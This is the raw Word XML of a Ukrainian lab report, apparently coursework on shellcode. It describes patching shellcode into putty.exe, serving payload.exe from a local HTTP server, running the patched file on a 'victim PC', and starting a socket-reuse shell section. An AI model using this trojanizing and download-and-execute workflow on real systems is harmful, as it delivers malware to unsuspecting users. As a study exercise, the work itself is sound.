        <w:t>f</w:t>
      </w:r>
      <w:r w:rsidR="00546DB9" w:rsidRPr="00BF5DE1">
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00546DB9" w:rsidRPr="0018363E">
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>bin</w:t>
      </w:r>
      <w:r w:rsidR="00546DB9" w:rsidRPr="00BF5DE1">
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00546DB9" w:rsidRPr="0018363E">
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>task</w:t>
      </w:r>
      <w:r w:rsidR="00546DB9" w:rsidRPr="00BF5DE1">
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>1_</w:t>
      </w:r>
      <w:r w:rsidR="00546DB9" w:rsidRPr="0018363E">
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sc</w:t>
      </w:r>
      <w:r w:rsidR="00546DB9" w:rsidRPr="00BF5DE1">
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00546DB9" w:rsidRPr="0018363E">
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>asm</w:t>
      </w:r>
      <w:r w:rsidR="00546DB9" w:rsidRPr="00BF5DE1">
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:r w:rsidR="00546DB9" w:rsidRPr="0018363E">
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>o</w:t>
      </w:r>
      <w:r w:rsidR="00546DB9" w:rsidRPr="00BF5DE1">
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00546DB9" w:rsidRPr="0018363E">
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>task</w:t>
      </w:r>
      <w:r w:rsidR="00546DB9" w:rsidRPr="00BF5DE1">
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>1_</w:t>
      </w:r>
      <w:r w:rsidR="00546DB9" w:rsidRPr="0018363E">
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sc</w:t>
      </w:r>
      <w:r w:rsidR="00546DB9" w:rsidRPr="00BF5DE1">
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00546DB9" w:rsidRPr="0018363E">
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>obj</w:t>
      </w:r>
      <w:r w:rsidR="00546DB9" w:rsidRPr="00BF5DE1">
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> &amp;&amp; </w:t>
      </w:r>
      <w:r w:rsidR="00546DB9" w:rsidRPr="0018363E">
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>python</w:t>
      </w:r>
      <w:r w:rsidR="00546DB9" w:rsidRPr="00BF5DE1">
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> ../</w:t>
      </w:r>
      <w:r w:rsidR="00546DB9" w:rsidRPr="0018363E">
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>patcher</w:t>
      </w:r>
      <w:r w:rsidR="00546DB9" w:rsidRPr="00BF5DE1">
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00546DB9" w:rsidRPr="0018363E">
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>py</w:t>
      </w:r>
      <w:r w:rsidR="00546DB9" w:rsidRPr="00BF5DE1">
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> --</w:t>
      </w:r>
      <w:r w:rsidR="00546DB9" w:rsidRPr="0018363E">
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>exe</w:t>
      </w:r>
      <w:r w:rsidR="00546DB9" w:rsidRPr="00BF5DE1">
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00546DB9" w:rsidRPr="0018363E">
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>putty</w:t>
      </w:r>
      <w:r w:rsidR="00546DB9" w:rsidRPr="00BF5DE1">
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00546DB9" w:rsidRPr="0018363E">
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>exe</w:t>
      </w:r>
      <w:r w:rsidR="00546DB9" w:rsidRPr="00BF5DE1">
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> --</w:t>
      </w:r>
      <w:r w:rsidR="00546DB9" w:rsidRPr="0018363E">
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sc</w:t>
      </w:r>
      <w:r w:rsidR="00546DB9" w:rsidRPr="00BF5DE1">
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00546DB9" w:rsidRPr="0018363E">
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>task</w:t>
      </w:r>
      <w:r w:rsidR="00546DB9" w:rsidRPr="00BF5DE1">
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>1_</w:t>
      </w:r>
      <w:r w:rsidR="00546DB9" w:rsidRPr="0018363E">
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sc</w:t>
      </w:r>
      <w:r w:rsidR="00546DB9" w:rsidRPr="00BF5DE1">
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00546DB9" w:rsidRPr="0018363E">
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>obj</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42681F6B" w14:textId="34D282CE" w:rsidR="00C70F12" w:rsidRPr="00571EBF" w:rsidRDefault="00087988">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0AF0F12E" wp14:editId="69BE343E">
            <wp:extent cx="6393180" cy="3403058"/>
            <wp:effectExtent l="0" t="0" r="7620" b="6985"/>
            <wp:docPr id="34540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043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5147" cy="34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C4D2" w14:textId="1BD951A0" w:rsidR="0009701C" w:rsidRPr="00DF7696" w:rsidRDefault="00DF7696" w:rsidP="000A7011">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">Отримаємо файл </w:t>
      </w:r>
      <w:r w:rsidR="00633445" w:rsidRPr="00480730">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>patched.exe</w:t>
      </w:r>
      <w:r w:rsidR="00480730">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D1769B9" w14:textId="302CFA4A" w:rsidR="000A7011" w:rsidRPr="00AC4131" w:rsidRDefault="000A7011" w:rsidP="000A7011">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">Запустимо </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r w:rsidRPr="00C15835">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>сервер:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4553C9BC" w14:textId="3A6F1939" w:rsidR="00E224AC" w:rsidRPr="00E224AC" w:rsidRDefault="000A7011" w:rsidP="000A7011">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00813527">
        <w:rPr>
          <w:rStyle w:val="a7"/>
        </w:rPr>
        <w:t>$ python -m http.server 2291</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72F7F363" w14:textId="15E9CC6A" w:rsidR="000A7011" w:rsidRDefault="00E03C8C" w:rsidP="000A7011">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3322BF8B" wp14:editId="5EF91D66">
            <wp:extent cx="6229852" cy="556260"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="17894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936" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId27"/>
                    <a:srcRect b="21995"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6255327" cy="5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1051E" w14:textId="66005D47" w:rsidR="000A7011" w:rsidRPr="00101D69" w:rsidRDefault="000A7011" w:rsidP="000A7011">
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Файл</w:t>
      </w:r>
      <w:r w:rsidRPr="001F71BF">
        <w:rPr>
          <w:rStyle w:val="a3"/>
        </w:rPr>
        <w:t xml:space="preserve"> payload.exe </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">доступний за </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
      <w:r w:rsidRPr="00E10813">
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00E10813">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="005058A8">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>http</w:t>
      </w:r>
      <w:r w:rsidRPr="00E16D75">
        <w:t>://</w:t>
      </w:r>
      <w:r w:rsidRPr="007D2F99">
        <w:t>192.168.1.</w:t>
      </w:r>
      <w:r w:rsidR="005F49A0" w:rsidRPr="001A1C14">
        <w:t>10</w:t>
      </w:r>
      <w:r w:rsidRPr="00E16D75">
        <w:t>:2291</w:t>
      </w:r>
      <w:r w:rsidRPr="005C3F6F">
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>payload</w:t>
      </w:r>
      <w:r w:rsidRPr="00E16D75">
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52F115E0" w14:textId="77777777" w:rsidR="00C15835" w:rsidRPr="00A91B24" w:rsidRDefault="00C15835" w:rsidP="004B3A7A"/>
    <w:p w14:paraId="532895F7" w14:textId="378DEAEE" w:rsidR="00C15835" w:rsidRPr="00A91B24" w:rsidRDefault="0059454B" w:rsidP="004B3A7A">
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">На ПК жертви встановимо </w:t>
      </w:r>
      <w:hyperlink r:id="rId28" w:history="1">
        <w:r w:rsidRPr="00D129B5">
          <w:rPr>
            <w:rStyle w:val="a4"/>
            <w:lang w:val="uk-UA"/>
          </w:rPr>
          <w:t xml:space="preserve">компоненти </w:t>
        </w:r>
        <w:r w:rsidRPr="00D129B5">
          <w:rPr>
            <w:rStyle w:val="a4"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Visual</w:t>
        </w:r>
        <w:r w:rsidRPr="00A30082">
          <w:rPr>
            <w:rStyle w:val="a4"/>
            <w:lang w:val="uk-UA"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
        <w:r w:rsidRPr="00D129B5">
          <w:rPr>
            <w:rStyle w:val="a4"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>C</w:t>
        </w:r>
        <w:r w:rsidRPr="00A30082">
          <w:rPr>
            <w:rStyle w:val="a4"/>
            <w:lang w:val="uk-UA"/>
          </w:rPr>
          <w:t>++</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00A30082">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">і </w:t>
      </w:r>
      <w:r w:rsidR="00060489">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>виконаємо</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004D2120">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>pat</w:t>
      </w:r>
      <w:r w:rsidR="00694CB1">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ched</w:t>
      </w:r>
      <w:r w:rsidRPr="00F42A98">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00F44B39">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>exe</w:t>
      </w:r>
      <w:r w:rsidRPr="00A30082">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E951789" w14:textId="01952E94" w:rsidR="00B106A9" w:rsidRPr="004D2120" w:rsidRDefault="00911AB8" w:rsidP="004B3A7A">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0FD2953E" wp14:editId="07B135BC">
            <wp:extent cx="6294120" cy="2432010"/>
            <wp:effectExtent l="0" t="0" r="0" b="6985"/>
            <wp:docPr id="123890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5458" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId29"/>
                    <a:srcRect b="37564"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6308306" cy="243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68095" w14:textId="05E11895" w:rsidR="00D34004" w:rsidRPr="000107AD" w:rsidRDefault="00D34004" w:rsidP="004B3A7A">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Бачимо повідомлення </w:t>
      </w:r>
      <w:r w:rsidR="00E026D4" w:rsidRPr="000510B1">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Message</w:t>
      </w:r>
      <w:r w:rsidRPr="000510B1">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> 1337</w:t>
      </w:r>
      <w:r w:rsidR="00E026D4" w:rsidRPr="000510B1">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> та скачаний файл </w:t>
      </w:r>
      <w:r w:rsidR="0008103E">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>patched</w:t>
      </w:r>
      <w:r w:rsidRPr="000510B1">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00F17DC2">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>exe</w:t>
      </w:r>
      <w:r w:rsidRPr="000510B1">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="294FD58D" w14:textId="1AA14517" w:rsidR="00017EB8" w:rsidRDefault="00017EB8" w:rsidP="004B3A7A">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>На сервері бачимо відповідний лог:</w:t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3C0DD6AA" wp14:editId="53EC7080">
            <wp:extent cx="6645910" cy="948055"/>
            <wp:effectExtent l="0" t="0" r="2540" b="4445"/>
            <wp:docPr id="128182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294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CDE7" w14:textId="77777777" w:rsidR="00017EB8" w:rsidRPr="00017EB8" w:rsidRDefault="00017EB8" w:rsidP="004B3A7A">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2618EA22" w14:textId="77777777" w:rsidR="00372730" w:rsidRPr="00A91B24" w:rsidRDefault="00372730" w:rsidP="00372730"/>
    <w:p w14:paraId="6B3EE49B" w14:textId="77777777" w:rsidR="00B47F67" w:rsidRPr="00A91B24" w:rsidRDefault="00B47F67" w:rsidP="00372730"/>
    <w:p w14:paraId="681C8F9B" w14:textId="1A1B5858" w:rsidR="00BD017C" w:rsidRPr="00372730" w:rsidRDefault="000169DE" w:rsidP="00372730">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="00F66D88" w:rsidRPr="00DE0260">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:r w:rsidR="0080790F">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Ш</w:t>
      </w:r>
      <w:r w:rsidR="0080790F" w:rsidRPr="0080790F">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>елл з використанням вже вiдкритого з’єднання (shell with socket</w:t>
      </w:r>
      <w:r w:rsidR="006C5DC0">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0080790F" w:rsidRPr="0080790F">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>reuse)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D26D858" w14:textId="0BE912F1" w:rsidR="00D66B52" w:rsidRPr="00784B64" w:rsidRDefault="00D66B52" w:rsidP="00D66B52">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">Файл </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>task</w:t>
      </w:r>
      <w:r w:rsidR="00715EDA">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="002339AC">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>_</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA014A">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>c</w:t>
      </w:r>
      <w:r w:rsidRPr="00E531BB">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA014A">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>asm</w:t>
      </w:r>
      <w:r w:rsidRPr="00E531BB">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>містить шелкод, що виконує наступні дії:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F15C696" w14:textId="14530385" w:rsidR="00BE4173" w:rsidRPr="008E0C46" w:rsidRDefault="00B47F67" w:rsidP="00D66B52">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="00D66B52">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00D66B52" w:rsidRPr="00165205">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Зна</w:t>
      </w:r>
      <w:r w:rsidR="00D66B52">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">ходить </w:t>
      </w:r>
      <w:r w:rsidR="005A6FCE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SetConsoleCP</w:t>
      </w:r>
      <w:r w:rsidR="005A6FCE" w:rsidRPr="003B2D81">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="003B2D81" w:rsidRPr="003B2D81">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003B2D81">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SetConsoleOutputCP</w:t>
      </w:r>
      <w:r w:rsidR="003B2D81" w:rsidRPr="003B2D81">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="005A6FCE" w:rsidRPr="003B2D81">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D66B52" w:rsidRPr="00C37116">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>CreateProcessA</w:t>
      </w:r>
      <w:r w:rsidR="005A0D7C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="003B2D81">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Sleep</w:t>
      </w:r>
      <w:r w:rsidR="00D66B52">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> в </w:t>
      </w:r>
      <w:r w:rsidR="00D66B52">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>k</w:t>
      </w:r>
      <w:r w:rsidR="00D66B52" w:rsidRPr="005800CC">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ernel</w:t>
      </w:r>
      <w:r w:rsidR="00D66B52" w:rsidRPr="00165205">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>32.</w:t>
      </w:r>
      <w:r w:rsidR="00D66B52">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>dll</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BEA69FD" w14:textId="1A17FE42" w:rsidR="00812A64" w:rsidRPr="008E0C46" w:rsidRDefault="00796D30" w:rsidP="00692C95">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="00692C95">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00692C95" w:rsidRPr="00165205">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Зна</w:t>
      </w:r>
      <w:r w:rsidR="00692C95">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">ходить </w:t>
      </w:r>
      <w:r w:rsidR="005259A7" w:rsidRPr="005259A7">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>getsockname</w:t>
      </w:r>
      <w:r w:rsidR="00692C95" w:rsidRPr="003B2D81">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="005259A7" w:rsidRPr="005259A7">
        <w:rPr>
          <w:lang w:val="ru-UA"/>
        </w:rPr>
        <w:t>ntohs</w:t>
      </w:r>
      <w:r w:rsidR="00692C95" w:rsidRPr="003B2D81">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="005259A7" w:rsidRPr="005259A7">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>send</w:t>
      </w:r>
      <w:r w:rsidR="00692C95">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> в </w:t>
      </w:r>
      <w:r w:rsidR="00FE3BC5">
        <w:rPr>
